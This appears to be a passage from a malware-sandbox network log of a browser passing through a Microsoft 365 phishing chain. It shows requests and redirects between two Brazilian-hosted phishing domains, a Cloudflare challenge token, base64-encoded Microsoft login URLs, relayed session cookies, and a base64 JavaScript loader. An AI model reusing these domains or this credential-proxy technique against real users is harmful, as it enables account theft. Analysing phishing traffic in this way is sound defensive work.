                                                        2025-03-17 16:42:41 UTC989INData Raw: 72 71 32 70 6c 36 71 2b 74 72 2b 43 77 63 62 46 6b 61 66 41 67 71 65 6e 75 70 37 4b 6a 37 6d 51 7a 63 37 54 6b 38 4c 4c 70 5a 50 57 6d 71 2b 55 32 4d 37 54 6e 38 2f 42 73 5a 32 69 30 63 65 6e 70 74 58 4c 37 4f 72 47 76 2f 48 7a 79 50 4f 7a 34 4c 44 46 2b 66 76 6b 72 37 33 37 36 66 37 57 42 63 49 45 77 2f 44 6c 31 63 4d 4d 39 77 50 66 45 51 2f 37 7a 2f 77 49 34 63 38 5a 36 2b 63 57 47 4e 72 74 32 77 72 59 37 64 77 6a 44 76 54 35 4a 79 49 49 36 41 49 69 42 77 67 45 37 78 44 77 4e 51 73 32 4e 44 4c 32 4e 6a 6f 38 2b 7a 7a 37 4b 6a 51 4f 2b 55 51 59 46 52 52 4a 48 69 41 4a 53 7a 63 73 43 55 77 36 54 67 38 31 4b 52 59 7a 46 69 63 6a 46 30 31 63 4b 6b 6f 71 4f 46 64 66 48 6c 52 6b 59 56 70 4a 4b 47 64 62 50 44 5a 50 52 47 35 50 4c 43 5a 46 5a 47 42 46 53 6a 6c
                                                        Data Ascii: rq2pl6q+tr+CwcbFkafAgqenup7Kj7mQzc7Tk8LLpZPWmq+U2M7Tn8/BsZ2i0cenptXL7OrGv/HzyPOz4LDF+fvkr7376f7WBcIEw/Dl1cMM9wPfEQ/7z/wI4c8Z6+cWGNrt2wrY7dwjDvT5JyII6AIiBwgE7xDwNQs2NDL2Njo8+zz7KjQO+UQYFRRJHiAJSzcsCUw6Tg81KRYzFicjF01cKkoqOFdfHlRkYVpJKGdbPDZPRG5PLCZFZGBFSjl
                                                        2025-03-17 16:42:41 UTC1369INData Raw: 59 35 31 62 70 65 5a 6d 58 69 5a 6e 57 5a 6b 72 57 36 6a 63 62 43 71 66 58 2b 79 73 71 64 73 63 61 61 64 66 62 2b 55 6b 59 4b 62 67 6f 4f 47 65 5a 2b 45 67 4b 47 35 74 70 65 2f 70 39 43 4e 71 38 6e 41 6f 35 65 4f 6b 61 62 59 79 72 69 64 7a 37 6a 56 6f 74 2b 77 31 61 48 6b 30 61 4f 38 74 63 53 39 76 75 2f 41 7a 71 7a 4c 31 4d 72 45 34 36 2f 6f 7a 4d 50 4d 32 38 6a 49 39 65 72 4d 32 74 38 48 77 41 58 2b 2b 4e 72 6b 77 39 6e 4a 35 67 50 64 32 38 6b 53 30 4d 6a 74 7a 67 2f 71 38 76 41 49 32 41 2f 73 2f 65 38 52 42 52 50 69 38 43 49 57 36 53 6a 71 36 66 34 74 47 77 33 6f 44 67 30 6e 37 41 38 4d 4b 66 6f 55 47 43 30 4f 50 79 73 30 41 54 45 63 4d 68 45 31 43 43 63 55 46 6a 6f 45 48 42 67 37 4b 77 31 44 51 7a 4d 69 4d 45 59 57 46 6a 4d 63 53 78 39 63 49 45 41 67
                                                        Data Ascii: Y51bpeZmXiZnWZkrW6jcbCqfX+ysqdscaadfb+UkYKbgoOGeZ+EgKG5tpe/p9CNq8nAo5eOkabYyridz7jVot+w1aHk0aO8tcS9vu/AzqzL1MrE46/ozMPM28jI9erM2t8HwAX++Nrkw9nJ5gPd28kS0Mjtzg/q8vAI2A/s/e8RBRPi8CIW6Sjq6f4tGw3oDg0n7A8MKfoUGC0OPys0ATEcMhE1CCcUFjoEHBg7Kw1DQzMiMEYWFjMcSx9cIEAg
                                                        2025-03-17 16:42:41 UTC1369INData Raw: 56 64 66 49 52 37 65 49 43 49 66 72 4b 45 69 6f 46 70 67 36 65 46 75 6f 2b 70 65 5a 57 74 73 33 32 75 67 35 75 53 65 62 4b 67 68 58 32 62 76 34 69 42 6e 38 43 64 7a 36 69 72 6b 36 79 58 73 35 65 78 72 4c 53 59 75 4c 43 33 6e 4a 57 76 31 37 48 6a 75 39 75 6d 77 4d 75 6c 32 39 33 5a 71 76 50 6f 38 37 4c 6d 78 4d 53 32 75 50 62 45 35 39 66 58 41 4d 6e 74 34 75 77 46 42 66 65 36 77 41 6e 35 33 63 6e 36 36 66 6e 6a 42 39 7a 30 7a 4f 6f 53 43 51 54 32 43 51 33 31 37 65 76 38 38 2f 72 79 41 74 37 36 49 68 54 36 4c 4f 72 70 41 69 51 4b 36 79 58 6f 48 50 45 71 4a 43 44 31 4c 78 51 77 50 76 74 41 2f 76 30 53 48 44 31 47 48 55 68 41 4d 78 35 42 53 54 77 39 42 53 45 4b 45 45 77 72 48 6b 39 41 4b 67 74 54 52 43 38 74 4a 31 63 33 59 69 42 4e 57 6a 51 69 47 57 56 64 52
                                                        Data Ascii: VdfIR7eICIfrKEioFpg6eFuo+peZWts32ug5uSebKghX2bv4iBn8Cdz6irk6yXs5exrLSYuLC3nJWv17Hju9umwMul293ZqvPo87LmxMS2uPbE59fXAMnt4uwFBfe6wAn53cn66fnjB9z0zOoSCQT2CQ317ev88/ryAt76IhT6LOrpAiQK6yXoHPEqJCD1LxQwPvtA/v0SHD1GHUhAMx5BSTw9BSEKEEwrHk9AKgtTRC8tJ1c3YiBNWjQiGWVdR
                                                        2025-03-17 16:42:41 UTC1201INData Raw: 47 68 49 6d 41 6e 6f 47 69 73 70 56 73 74 33 75 4f 6a 4c 2b 49 73 6e 69 77 77 71 4f 52 6e 35 69 34 68 73 75 35 68 34 36 70 6f 38 4b 49 30 6f 72 56 6c 72 47 77 79 36 4c 5a 6d 73 79 70 33 70 62 51 73 70 6d 77 77 4b 58 6e 76 4c 69 34 32 4d 53 35 75 74 79 75 37 4c 32 70 78 4f 62 44 77 4e 6a 5a 72 50 72 6c 37 4d 6e 5a 36 62 71 2b 74 66 47 38 7a 76 50 67 30 39 66 6c 2b 75 72 49 77 65 67 49 7a 68 50 6f 41 4e 51 48 43 68 62 72 43 78 72 57 32 74 55 61 30 2f 4c 72 33 68 76 59 46 2f 77 66 39 50 50 6a 43 75 54 6c 37 79 4c 75 4d 77 6a 75 39 6a 67 4a 41 77 67 6e 38 7a 54 35 50 67 6b 7a 39 44 41 5a 49 77 4a 44 52 6b 62 38 41 6b 34 2f 49 42 41 49 51 43 4d 63 4d 42 4d 69 4d 43 45 71 4b 52 77 58 47 52 46 64 4f 54 49 5a 54 79 52 53 4a 53 67 6f 52 69 6c 46 59 30 63 72 49 6c
                                                        Data Ascii: GhImAnoGispVst3uOjL+IsniwwqORn5i4hsu5h46po8KI0orVlrGwy6LZmsyp3pbQspmwwKXnvLi42MS5utyu7L2pxObDwNjZrPrl7MnZ6bq+tfG8zvPg09fl+urIwegIzhPoANQHChbrCxrW2tUa0/Lr3hvYF/wf9PPjCuTl7yLuMwju9jgJAwgn8zT5Pgkz9DAZIwJDRkb8Ak4/IBAIQCMcMBMiMCEqKRwXGRFdOTIZTyRSJSgoRilFY0crIl


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        17192.168.2.44975223.95.206.2314436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:42:42 UTC1226OUTPOST /?noiajvga=cebc15b3c86fa69be7285330a66657219c1287ff53c1f7059daa44d10ef1952d669e891ae8484a544c8d16f0be8cc4af98aec84015acb9fd06d2a3ccc941854c HTTP/1.1
                                                        Host: h89s9dhj.ccbequipamentos.com.br
                                                        Connection: keep-alive
                                                        Content-Length: 987
                                                        Cache-Control: max-age=0
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Origin: https://h89s9dhj.ccbequipamentos.com.br
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-User: ?1
                                                        Sec-Fetch-Dest: document
                                                        Referer: https://h89s9dhj.ccbequipamentos.com.br/?noiajvga=cebc15b3c86fa69be7285330a66657219c1287ff53c1f7059daa44d10ef1952d669e891ae8484a544c8d16f0be8cc4af98aec84015acb9fd06d2a3ccc941854c
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk
                                                        2025-03-17 16:42:42 UTC987OUTData Raw: 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 3d 30 2e 71 53 37 30 41 6d 75 64 57 74 76 41 39 37 74 66 58 48 6d 34 37 64 45 4b 5f 4b 68 48 72 6a 46 42 65 6e 4e 34 6e 61 46 63 56 6c 69 76 59 41 37 73 75 30 51 55 51 4d 59 6b 31 38 68 32 6b 31 7a 2d 64 6b 55 41 4d 37 4f 56 31 43 30 54 68 45 53 71 68 79 50 49 68 70 70 49 56 55 2d 46 77 43 6f 5a 52 36 64 6a 35 30 71 4a 73 4a 73 77 30 37 5f 59 5f 7a 4f 43 5a 69 50 44 4a 2d 6c 39 32 55 4f 76 4c 65 75 5f 39 78 78 50 4a 66 48 72 4b 6a 5f 54 39 58 56 78 36 6e 58 4a 51 62 34 46 4e 50 5a 2d 70 4d 49 68 45 75 58 4b 62 4d 49 35 48 4c 39 2d 5a 75 47 37 5f 33 69 31 4b 66 48 65 46 74 7a 4a 37 76 36 4a 49 78 74 58 75 76 6b 33 5a 63 6f 43 77 78 56 6a 58 6f 2d 58 44 45 32 4e 77 77 73 54 30 4f 54 59 4d 48 48
                                                        Data Ascii: cf-turnstile-response=0.qS70AmudWtvA97tfXHm47dEK_KhHrjFBenN4naFcVlivYA7su0QUQMYk18h2k1z-dkUAM7OV1C0ThESqhyPIhppIVU-FwCoZR6dj50qJsJsw07_Y_zOCZiPDJ-l92UOvLeu_9xxPJfHrKj_T9XVx6nXJQb4FNPZ-pMIhEuXKbMI5HL9-ZuG7_3i1KfHeFtzJ7v6JIxtXuvk3ZcoCwxVjXo-XDE2NwwsT0OTYMHH
                                                        2025-03-17 16:42:42 UTC482INHTTP/1.1 302 Found
                                                        location: https://hapiinenstys.criadordeconexoes.com.br/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL2hhcGlpbmVuc3R5cy5jcmlhZG9yZGVjb25leG9lcy5jb20uYnIvIiwiZG9tYWluIjoiaGFwaWluZW5zdHlzLmNyaWFkb3JkZWNvbmV4b2VzLmNvbS5iciIsImtleSI6InFWUDg3RWFGR0NRbiIsInFyYyI6bnVsbCwiaWF0IjoxNzQyMjI5NzYyLCJleHAiOjE3NDIyMjk4ODJ9.bpFU2t6kMODAzyr1sHzSD1xCGWuz2a7omLxO3ziToVg
                                                        Date: Mon, 17 Mar 2025 16:42:42 GMT
                                                        Connection: close
                                                        Transfer-Encoding: chunked
                                                        2025-03-17 16:42:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        18192.168.2.449753104.18.94.414436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:42:42 UTC639OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/2100462587:1742228952:oCWRJ_9F7aDLWE5rdVZZqokEYX6VeFO4JC8_BuYfHPM/921df19f1aa9330c/5f0QPWAUaeKYb3u9onIZ_IkF5wttGhEKmnf8t0Zrm6E-1742229749-1.1.1.1-yhPGGuzzN6GGa3jTR0pmjl5lW63MvnU_suAvvMWiHP2s4Z8Ctt7xP0BcTNoSFFCa HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-17 16:42:42 UTC442INHTTP/1.1 400 Bad Request
                                                        Date: Mon, 17 Mar 2025 16:42:42 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 14
                                                        Connection: close
                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                        cf-chl-out: ZLqv/ZRvnphvc+ssEiAP09IdZmvPu6Zg8+FYLtHAAqueAJ9oKlEH1zkO837HCcHfvyQX5PmNmr/S0P+juXFwqA==$a5TBZoudzN4kpb67fP83Qw==
                                                        Server: cloudflare
                                                        CF-RAY: 921df1edea6b0ee6-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-17 16:42:42 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 38 30 7d
                                                        Data Ascii: {"err":100280}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        19192.168.2.44975423.95.206.2314436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:42:43 UTC1088OUTGET /?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL2hhcGlpbmVuc3R5cy5jcmlhZG9yZGVjb25leG9lcy5jb20uYnIvIiwiZG9tYWluIjoiaGFwaWluZW5zdHlzLmNyaWFkb3JkZWNvbmV4b2VzLmNvbS5iciIsImtleSI6InFWUDg3RWFGR0NRbiIsInFyYyI6bnVsbCwiaWF0IjoxNzQyMjI5NzYyLCJleHAiOjE3NDIyMjk4ODJ9.bpFU2t6kMODAzyr1sHzSD1xCGWuz2a7omLxO3ziToVg HTTP/1.1
                                                        Host: hapiinenstys.criadordeconexoes.com.br
                                                        Connection: keep-alive
                                                        Cache-Control: max-age=0
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-User: ?1
                                                        Sec-Fetch-Dest: document
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Referer: https://h89s9dhj.ccbequipamentos.com.br/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-17 16:42:43 UTC282INHTTP/1.1 302 Found
                                                        Set-Cookie: qPdM=qVP87EaFGCQn; path=/; samesite=none; secure; httponly
                                                        Set-Cookie: qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; path=/; samesite=none; secure; httponly
                                                        location: /
                                                        Date: Mon, 17 Mar 2025 16:42:43 GMT
                                                        Connection: close
                                                        Transfer-Encoding: chunked
                                                        2025-03-17 16:42:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        20192.168.2.44975523.95.206.2314436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:42:44 UTC835OUTGET / HTTP/1.1
                                                        Host: hapiinenstys.criadordeconexoes.com.br
                                                        Connection: keep-alive
                                                        Cache-Control: max-age=0
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-User: ?1
                                                        Sec-Fetch-Dest: document
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Referer: https://h89s9dhj.ccbequipamentos.com.br/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk
                                                        2025-03-17 16:42:44 UTC2427INHTTP/1.1 302 Found
                                                        Cache-Control: no-store, no-cache
                                                        Pragma: no-cache
                                                        Content-Type: text/html; charset=utf-8
                                                        Expires: -1
                                                        Location: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly93d3cub2ZmaWNlLmNvbS9sb2dpbiM=
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                        x-ms-request-id: 4357d2cc-31f3-4b69-984a-05c4fc1f0c00
                                                        x-ms-ests-server: 2.1.20203.6 - NCUS ProdSlices
                                                        nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                        x-ms-srs: 1.P
                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                        Content-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-s7mhNgQBd6cQI-97rLkH4w' 'unsafe-inline' 'unsafe-eval' https://*.msauth.net https://*.msftauth.net https://*.msftauthimages.net https://*.msauthimages.net https://*.msidentity.com https://*.microsoftonline-p.com https://*.microsoftazuread-sso.com https://*.azureedge.net https://*.outlook.com https://*.office.com https://*.office365.com https://*.microsoft.com https://*.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-All
                                                        Set-Cookie: fpc=AjUAFJMlP0ZCgsS-Ll1segI; expires=Wed, 16-Apr-2025 16:42:44 GMT; path=/; secure; HttpOnly; SameSite=None
                                                        Set-Cookie: esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEs2cTC55lMzi2CYsw42k_1wqQJXOtMYOzSODe6zEFFYdXCRxaO7gdZQRJIGL8ni-lzNjggwspnf8D3op1jox69xUXOtSl5_g0RklIr1K3i4amZorZVZk5WzXQwODhXgeSWz-JD3usNSG2-o1GAW7N6RK2l6X6aAIHzYd3LZEV1CsgAA; domain=hapiinenstys.criadordeconexoes.com.br; path=/; secure; HttpOnly; SameSite=None
                                                        Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly
                                                        Set-Cookie: stsservicecookie=estsfd; path=/; secure; samesite=none; httponly
                                                        Date: Mon, 17 Mar 2025 16:42:43 GMT
                                                        Connection: close
                                                        content-length: 956
                                                        Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                                        2025-03-17 16:42:44 UTC956INData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 64 61 74 61 3a 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 62 61 73 65 36 34 2c 5a 6e 56 75 59 33 52 70 62 32 34 67 59 33 56 7a 64 47 39 74 52 6e 56 75 59 33 52 70 62 32 34 6f 4b 53 42 37 43 69 41 67 49 43 42 70 5a 69 41 6f 49 57 52 76 59 33 56 74 5a 57 35 30 4c 6e 46 31 5a 58 4a 35 55 32 56 73 5a 57 4e 30 62 33 49 6f 49 69 35 6a 64 58 4e 30 62 32 30 74 59 32 78 68 63 33 4d 69 4b 53 42 38 66 43 41 68 5a 47 39 6a 64 57 31 6c 62 6e 51 75 63 58 56 6c 63 6e 6c 54 5a 57 78 6c 59 33 52 76 63 69 67 69 4c 6e 4a 76 64 47 46 30 5a 53 31 6a 62 47 46 7a 63 79 49 70 4b 53 42 37 43 69 41 67 49 43 41 67 49 43 41 67 64 6d 46 79 49 47 35 6c 64 30 52 70 64 69 41 39 49 47 52 76 59 33 56 74 5a
                                                        Data Ascii: <html><head><script src="data:text/javascript;base64,ZnVuY3Rpb24gY3VzdG9tRnVuY3Rpb24oKSB7CiAgICBpZiAoIWRvY3VtZW50LnF1ZXJ5U2VsZWN0b3IoIi5jdXN0b20tY2xhc3MiKSB8fCAhZG9jdW1lbnQucXVlcnlTZWxlY3RvcigiLnJvdGF0ZS1jbGFzcyIpKSB7CiAgICAgICAgdmFyIG5ld0RpdiA9IGRvY3VtZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        21192.168.2.44975623.95.206.2314436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:42:44 UTC1182OUTGET /?piwg10otu=aHR0cHM6Ly93d3cub2ZmaWNlLmNvbS9sb2dpbiM= HTTP/1.1
                                                        Host: hapiinenstys.criadordeconexoes.com.br
                                                        Connection: keep-alive
                                                        Cache-Control: max-age=0
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-User: ?1
                                                        Sec-Fetch-Dest: document
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Referer: https://h89s9dhj.ccbequipamentos.com.br/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; fpc=AjUAFJMlP0ZCgsS-Ll1segI; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEs2cTC55lMzi2CYsw42k_1wqQJXOtMYOzSODe6zEFFYdXCRxaO7gdZQRJIGL8ni-lzNjggwspnf8D3op1jox69xUXOtSl5_g0RklIr1K3i4amZorZVZk5WzXQwODhXgeSWz-JD3usNSG2-o1GAW7N6RK2l6X6aAIHzYd3LZEV1CsgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
                                                        2025-03-17 16:42:45 UTC3011INHTTP/1.1 302 Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Location: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3Nra [TRUNCATED]
                                                        Set-Cookie: OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; expires=Tue, 17 Mar 2026 16:42:45 GMT; path=/; secure; samesite=none; httponly
                                                        Set-Cookie: OH.SID=; expires=Thu, 01 Jan 1970 00:00:00 GMT; path=/
                                                        Set-Cookie: .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; expires=Mon, 17 Mar 2025 16:57:45 GMT; path=/; secure; samesite=none; httponly
                                                        Set-Cookie: .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; expires=Mon, 17 Mar 2025 16:57:45 GMT; path=/; secure; samesite=none; httponly
                                                        Request-Context: appId=
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                        X-UA-Compatible: IE=edge,chrome=1
                                                        Request-Id: 53697181-6011-4173-aa95-ebb9c1807e5a
                                                        X-Cache: CONFIG_NOCACHE
                                                        X-MSEdge-Ref: Ref A: F13AEDA8EA0649C5998508461F9DD5CE Ref B: EWR311000103011 Ref C: 2025-03-17T16:42:45Z
                                                        Date: Mon, 17 Mar 2025 16:42:44 GMT
                                                        Connection: close
                                                        Content-Length: 0
                                                        Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        22192.168.2.44975723.95.206.2314436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
